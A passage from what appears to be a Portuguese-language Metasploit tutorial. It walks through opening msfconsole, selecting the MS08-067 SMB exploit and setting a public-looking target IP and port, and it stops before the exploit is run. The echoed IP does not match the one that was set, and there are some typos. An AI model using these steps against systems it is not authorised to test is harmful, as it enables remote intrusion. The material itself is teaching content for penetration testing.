5.3 - Usando Metasploit em modo console
O mfsconsole é o Metasploit em modo console e uma forma mais flexível de se utilizar o framework. Para iniciar o Metasploit, digite no shell:
# msfconsole
Será apresentado o cursor abaixo:
msf >
Verifique, dentro do console do Metasploit, quais exploits estão à disposição com o comando:
msf >show exploits
Neste ponto, informe o tipo de exploit a ser utilizado com o comando use:
msf > use windows/smb/ms08_067_netapi
msf wins_ms08_067_netapi >
Dentro do exploit, veja os atributos exigidos com o comando show options:
msf wins_ms08_067_netapi > show options
Será mostrado o relatório similar ao apresentado a seguir.
Name Current Setting Required Description
-------- --------------- -------- ----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER)
Explot Target:
Neste caso, o exploit aceita as opções de Remote Host, Remote port e SMBPIPE. Para configurar essas opções, utilize o comando set:
msf wins_ms08_067_netapi > set RHOST 200.126.35.34
RHOST -> 200.130.26.34
msf wins_ms08_067_netapi > set RPORT 445
RPORT -> 445